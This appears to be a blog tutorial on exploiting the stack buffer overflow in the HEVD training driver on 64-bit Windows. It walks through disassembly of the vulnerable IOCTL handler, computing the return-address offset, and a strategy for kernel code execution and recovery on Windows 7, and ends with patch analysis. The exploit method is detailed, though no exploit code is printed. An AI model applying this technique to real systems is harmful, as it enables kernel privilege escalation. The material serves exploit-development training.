Table of Contents

Brief

The vulnerability class in question that we are going to hunt for and exploit is a Stack Buffer Overflow in HEVD.sys Windows driver compiled without stack cookie/canary(/GS Buffer Security Check) or StackGuard mitigation. We are also going to look at productization and stabilization of the exploit later on.

We are only going to consider Intel 64(64-bit version of the x86 ISA) targets in this blog post unless explicitly stated otherwise.

Vulnerability

First off, we should grab the latest version of the HEVD binary that we are going to exploit. I am going to use HEVD v3.00.

Our next step would be to of course load the vulnerable version of the binary in IDA Pro for static analysis. You could also use IDA Free/Demo/Home or any other disassembler of your choice. Hex-Rays decompiler is not strictly necessary although it would certainly be helpful.

We will be utilizing the provided PDB symbol file which will greatly aid us in RE and later on we will also take a look at the patch to discuss how the vulnerability was fixed.

An useful IDA Pro plugin for initial automated analysis of Windows drivers is DriverBuddyReloaded by VoidSec. It may provide us with a useful starting point and save some time in the process.

After opening the binary, we land in GsDriverEntry() routine which doesn’t look anything like the DriverEntry() routine that we are familiar with. It is actually inserted by the compiler when the code is compiled with the /GS compiler flag and performs some initialization to support the detection of buffer overruns.

hevd-gs-entry-point

We can simply follow the call to a function appropriately named here as DriverEntry_0(). Now, this looks more like it! We can already see the device name string and the MS-DOS device name string that are initialized to nt!_UNICODE_STRING structures using nt!RtlInitUnicodeString() routine.

hevd-real-entry-point

We can use Hex-Rays decompiler to decompile this function and note three things that are of concern to us:

  1. Creation of the named device object for the driver using nt!IoCreateDevice() routine. Notably, it doesn’t use nt!IoCreateDeviceSecure() routine that lets us implement access control. This potentially implies that any process running on the system even one with a Low Integrity Level token can open a handle to this device object.
  2. Creation of the symbolic link object to the device by using nt!IoCreateSymbolicLink() routine and supplying the MS-DOS device name for the device object. This is necessary to work with the driver from a user-mode application.
  3. Setting the pointer to the DispatchDeviceControl dispatch routine in the MajorFunction[] array of the driver object to handle IRP_MJ_DEVICE_CONTROL requests. For more information, refer to the MSDN documentation on the nt!_DRIVER_OBJECT structure and IRP_MJ_DEVICE_CONTROL.

hevd-real-entry-point-decompiled

Now that we have found the driver dispatch routine to handle IRPs with I/O function code of IRP_MJ_DEVICE_CONTROL, we can start looking for the various functionalities implemented by the driver that we can trigger from a user-mode client application by sending the appropriate IOCTL code and I/O parameters using kernel32!DeviceIoControl() routine.

And scrolling down a bit we found a call to IOCTL handler of stack buffer overflow thanks to the helpful debug prints baked into the code(yes, this happens sometimes in production builds too!)

hevd-dispatch-device-control-stack-buffer-overflow

But what is the IOCTL code through which we can take this code path?

Well, we just scroll up a bit in the control flow graph and spot some code that checks if ECX == 0x222003 and jumps to the location we highlighted above if the condition is true. Looks like we have found the IOCTL code to trigger a stack buffer overflow!

hevd-stack-buffer-overflow-ioctl

We can now decode the IOCTL code using OSR Online IOCTL Decoder.

hevd-stack-buffer-overflow-ioctl-decoded

The most notable fact about this is that it uses METHOD_NEITHER transfer type which means the I/O manager does not validate the buffers which reside in UVAS and are not copied to KVAS. It is up to the driver to implement proper sanity checks to determine if the buffers are safe to access from the driver.

Let’s take a gander at the disassembly and decompilation of the IOCTL handler of stack buffer overflow using IDA Pro and Hex-Rays decompiler:

PAGE:0000000140086594     ; =============== S U B R O U T I N E =======================================
PAGE:0000000140086594
PAGE:0000000140086594
PAGE:0000000140086594     ; int __fastcall BufferOverflowStackIoctlHandler(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)
PAGE:0000000140086594     BufferOverflowStackIoctlHandler proc near
PAGE:0000000140086594                                             ; CODE XREF: IrpDeviceIoCtlHandler+1D6↑p
PAGE:0000000140086594                                             ; DATA XREF: .pdata:0000000140084144↑o
PAGE:0000000140086594     Irp = rcx
PAGE:0000000140086594     IrpSp = rdx
PAGE:0000000140086594 000                 sub     rsp, 28h
PAGE:0000000140086598 028                 mov     Irp, [IrpSp+20h] ; UserBuffer
PAGE:000000014008659C 028                 mov     eax, 0C0000001h
PAGE:00000001400865A1 028                 mov     edx, [IrpSp+10h] ; Size
PAGE:00000001400865A4 028                 test    Irp, Irp
PAGE:00000001400865A7 028                 jz      short loc_1400865AE
PAGE:00000001400865A9 028                 call    TriggerBufferOverflowStack
PAGE:00000001400865AE
PAGE:00000001400865AE     loc_1400865AE:                          ; CODE XREF: BufferOverflowStackIoctlHandler+13↑j
PAGE:00000001400865AE 028                 add     rsp, 28h
PAGE:00000001400865B2 000                 retn
PAGE:00000001400865B2     BufferOverflowStackIoctlHandler endp
PAGE:00000001400865B2
PAGE:00000001400865B2     ; ---------------------------------------------------------------------------

hevd-stack-buffer-overflow-ioctl-handler-decompiled

The only thing this function does is extract the pointer to user’s input buffer and its length from the current I/O stack location which were copied as-is by the I/O manager from the user-mode client application to the nt!_IRP and its accompanying nt!_IO_STACK_LOCATION structure(s) without any form of checking and call HEVD!TriggerBufferOverflowStack() routine with the extracted values as arguments.

It looks as though the hunt is finally over as we descend upon the function which is so helpfully named TriggerBufferOverflowStack():

PAGE:00000001400865B4     ; =============== S U B R O U T I N E =======================================
PAGE:00000001400865B4
PAGE:00000001400865B4
PAGE:00000001400865B4     ; __int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
PAGE:00000001400865B4     TriggerBufferOverflowStack proc near    ; CODE XREF: BufferOverflowStackIoctlHandler+15↑p
PAGE:00000001400865B4                                             ; DATA XREF: .pdata:0000000140084150↑o
PAGE:00000001400865B4
PAGE:00000001400865B4     KernelBuffer    = dword ptr -818h
PAGE:00000001400865B4     var_18          = byte ptr -18h
PAGE:00000001400865B4     arg_0           = qword ptr  8
PAGE:00000001400865B4     arg_8           = qword ptr  10h
PAGE:00000001400865B4     arg_10          = qword ptr  18h
PAGE:00000001400865B4
PAGE:00000001400865B4     UserBuffer = rcx
PAGE:00000001400865B4     Size = rdx
PAGE:00000001400865B4     ; __unwind { // __C_specific_handler
PAGE:00000001400865B4 000                 mov     [rsp+arg_0], rbx
PAGE:00000001400865B9 000                 mov     [rsp+arg_8], rsi
PAGE:00000001400865BE 000                 mov     [rsp+arg_10], rdi
PAGE:00000001400865C3 000                 push    r12
PAGE:00000001400865C5 008                 push    r14
PAGE:00000001400865C7 010                 push    r15
PAGE:00000001400865C9 018                 sub     rsp, 820h
PAGE:00000001400865D0 838                 mov     rsi, Size
PAGE:00000001400865D3 838                 mov     rdi, UserBuffer
PAGE:00000001400865D6 838                 xor     ebx, ebx
PAGE:00000001400865D8 838                 mov     r12d, 800h
PAGE:00000001400865DE 838                 mov     r8d, r12d       ; Size
PAGE:00000001400865E1 838                 xor     edx, edx        ; Val
PAGE:00000001400865E3 838                 lea     UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:00000001400865E8 838                 call    memset
PAGE:00000001400865ED 838                 nop
PAGE:00000001400865EE
PAGE:00000001400865EE     loc_1400865EE:                          ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:00000001400865EE     ;   __try { // __except at $LN6_0       ; Alignment
PAGE:00000001400865EE 838                 lea     r8d, [rbx+1]
PAGE:00000001400865F2 838                 mov     edx, r12d       ; Length
PAGE:00000001400865F5 838                 mov     UserBuffer, rdi ; Address
PAGE:00000001400865F8 838                 call    cs:__imp_ProbeForRead
PAGE:00000001400865FE 838                 mov     r9, rdi
PAGE:0000000140086601 838                 lea     r8, aUserbuffer0xP ; "[+] UserBuffer: 0x%p\n"
PAGE:0000000140086608 838                 lea     r15d, [rbx+3]
PAGE:000000014008660C 838                 mov     edx, r15d       ; Level
PAGE:000000014008660F 838                 lea     r14d, [rbx+4Dh]
PAGE:0000000140086613 838                 mov     ecx, r14d       ; ComponentId
PAGE:0000000140086616 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008661C 838                 mov     r9, rsi
PAGE:000000014008661F 838                 lea     r8, aUserbufferSize ; "[+] UserBuffer Size: 0x%X\n"
PAGE:0000000140086626 838                 mov     edx, r15d       ; Level
PAGE:0000000140086629 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008662C 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086632 838                 lea     r9, [rsp+838h+KernelBuffer]
PAGE:0000000140086637 838                 lea     r8, aKernelbuffer0x ; "[+] KernelBuffer: 0x%p\n"
PAGE:000000014008663E 838                 mov     edx, r15d       ; Level
PAGE:0000000140086641 838                 mov     ecx, r14d       ; ComponentId
PAGE:0000000140086644 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008664A 838                 mov     r9d, r12d
PAGE:000000014008664D 838                 lea     r8, aKernelbufferSi ; "[+] KernelBuffer Size: 0x%X\n"
PAGE:0000000140086654 838                 mov     edx, r15d       ; Level
PAGE:0000000140086657 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008665A 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086660 838                 lea     r8, aTriggeringBuff_2 ; "[+] Triggering Buffer Overflow in Stack"...
PAGE:0000000140086667 838                 mov     edx, r15d       ; Level
PAGE:000000014008666A 838                 mov     ecx, r14d       ; ComponentId
PAGE:000000014008666D 838                 call    cs:__imp_DbgPrintEx
PAGE:0000000140086673 838                 mov     r8, rsi         ; MaxCount
PAGE:0000000140086676 838                 mov     Size, rdi       ; Src
PAGE:0000000140086679 838                 lea     UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:000000014008667E 838                 call    memmove
PAGE:0000000140086683 838                 jmp     short loc_1400866A0
PAGE:0000000140086683     ;   } // starts at 1400865EE
PAGE:0000000140086685     ; ---------------------------------------------------------------------------
PAGE:0000000140086685
PAGE:0000000140086685     $LN6_0:                                 ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:0000000140086685     ;   __except(1) // owned by 1400865EE
PAGE:0000000140086685 838                 mov     ebx, eax
PAGE:0000000140086687 838                 mov     r9d, eax
PAGE:000000014008668A 838                 lea     r8, aExceptionCode0 ; "[-] Exception Code: 0x%X\n"
PAGE:0000000140086691 838                 mov     edx, 3          ; Level
PAGE:0000000140086696 838                 lea     ecx, [Size+4Ah] ; ComponentId
PAGE:0000000140086699 838                 call    cs:__imp_DbgPrintEx
PAGE:000000014008669F 838                 nop
PAGE:00000001400866A0
PAGE:00000001400866A0     loc_1400866A0:                          ; CODE XREF: TriggerBufferOverflowStack+CF↑j
PAGE:00000001400866A0 838                 mov     eax, ebx
PAGE:00000001400866A2 838                 lea     r11, [rsp+838h+var_18]
PAGE:00000001400866AA 838                 mov     rbx, [r11+20h]
PAGE:00000001400866AE 838                 mov     rsi, [r11+28h]
PAGE:00000001400866B2 838                 mov     rdi, [r11+30h]
PAGE:00000001400866B6 838                 mov     rsp, r11
PAGE:00000001400866B9 018                 pop     r15
PAGE:00000001400866BB 010                 pop     r14
PAGE:00000001400866BD 008                 pop     r12
PAGE:00000001400866BF 000                 retn
PAGE:00000001400866BF     ; } // starts at 1400865B4
PAGE:00000001400866BF     TriggerBufferOverflowStack endp

hevd-stack-buffer-overflow-decompiled

The issue here(highlighted in red for your reading pleasure) is apparent. On one hand, we have a local variable called Dst and it is an array of type CHAR consisting of 0n2048/0x800 elements occupying 0n2048 * sizeof(CHAR) = 0n2048/0x800 bytes on the stack and on the other hand, we have an unsafe routine such as memmove() taking attacker-controlled input data and size as arguments and copying it to the buffer on the stack without any form of size validation thus making it possible to overflow its bounds and corrupt adjacent data on the stack.

This bug appears to be exploitable in practice too because the input data and the input size both appear to be completely attacker-controlled without any constraints.

Exploitation and Stabilization

Our objective is exploiting this vulnerability to achieve arbitrary code execution in kernel-mode and we previously said that we can corrupt data on the stack using the vulnerability but how does corrupting random stack data help us in any way except maybe causing a glorious bugcheck on the device?

Well, as you might know, the call instruction pushes the return address(address of the subsequent instruction following the call) on the stack before changing the (really)extended instruction pointer(EIP/RIP) value to the call target and the ret instruction pops the value at the top of the stack into EIP/RIP. They are both control flow instructions as they can be used to control the instruction pointer(a pointer to the next instruction to execute).

So what if we could overwrite a retaddr on the stack with the address of our payload buffer that we control? And when the function returns we are going to have our payload executed instead!

Now that we have defined our exploitation strategy, let’s discuss some potential problems and how we resolve them:

  1. Legacy and modern exploit mitigations such as KASLR, DEP, GS Cookie, KPP/PatchGuard, SMEP, SMAP, KPTI, kCFG, HyperGuard, HVCI, KCET etc.
  • Some of them are not applicable here, some can be entirely avoided or bypassed and others will completely thwart us. We will discuss them in detail on a case-by-case basis.
  1. Where do we put our payload?
  • User Virtual Address Space(UVAS).
  1. What happens if our payload UVA gets paged out before we are done?
  • Lock the payload pages into physical memory thus ensuring that they cannot be written to the pagefile.
  1. How do we know how much stack data to corrupt to cause a precise overwrite of the retaddr and not any other arbitrary data on the stack which may lead to system instability?
  • We must first draw the complete stack layout with the help of the disassembly shown above in order to understand this. hevd-stack-buffer-overflow-stack-layout Note that the offsets here are relative to the stack base containing the retaddr. From this diagram, we can see that after we overflow the bounds of the buffer Dst stored on stack into three non-volatile register contents also saved on stack we can finally overwrite the retaddr(ergo, retaddr offset = 0x800 + 0x8 * 0n3 = 0x818). I’ve seen some writeups use cyclic pattern generators for this purpose so feel free to confirm the above using Overflow Exploit Pattern Generator - Online Tool by @zerosum0x0. One thing to mention here is that we irreparably trash three saved non-volatile register contents on the stack(R12, R14, and R15) to get to the retaddr which is not ideal for stability but also unavoidable in our case.
  1. How do we pick up the original control flow and return back to user-mode after our payload finishes executing now that we have utterly messed up the stack?
  • There are quite a few approaches to deal with kernel-mode payload recovery or transitioning from ring 0 to ring 3 after successful exploitation, however, it is hard to find a universal method that is equally reliable or is the most optimal for every scenario. Ergo, we will again discuss them in detail on a case-by-case basis.

Case I

  • Intel OS Guard/SMEP not present, KVA Shadow/KPTI disabled
  • Target
    • Windows 7 OS or OS > Windows 7 but running on older Intel hardware(μarch < Ivy Bridge)
    • Intel processor that is not vulnerable to Rogue Data Cache Load/Meltdown/Variant 3/CVE-2017-5754 or without the Meltdown patch(KPTI disabled)
  • Proof of Concept

This is the easiest case to deal with as there are no kernel security mitigations to defeat, so we will start with this one(baby steps!)

Kernel-mode Payload Recovery

In order to understand the most optimal approach for our case(and also perhaps the easiest), we need to consult the disassembly of the caller of HEVD!TriggerBufferOverflowStack() and see the location where our callee would have normally returned had the control flow not been hijacked to execute our payload.

hevd-stack-buffer-overflow-recovery-stub

Once we identify that, we can append the code stub(highlighted in red) to our payload so that we can execute it ourselves and return to IRP_MJ_DEVICE_CONTROL IRP handler which is eventually going to return out of kernel-mode without crashing the system.

Demo

Here is a screenshot demonstrating successful exploitation of this vulnerability on a fully updated Windows 7 system with a modified PINKPANTHER payload to achieve Local Privilege Escalation(LPE):

hevd-stack-buffer-overflow-lpe-poc

Patch Analysis

So what was the fix? We can load the “secure” version of the binary into IDA Pro to find out.

hevd-stack-buffer-overflow-patch-analysis

Quite simple really as it turns out, by enforcing stringent bounds. As you might notice, the size parameter to memmove() is no longer attacker-controlled and it’s fixed to sizeof(KernelBuffer) bytes which means that we will no longer be able to overrun the contents of this buffer on the stack beyond its bounds.

Honourable Mention

Throughout this blog post I have assumed that the readers are already familiar with setting up a Windows test VM with full kernel debugging support and have done so but if that’s not the case, I’d implore you to give this a read: CodeMachine System setup for kernel development and debugging guide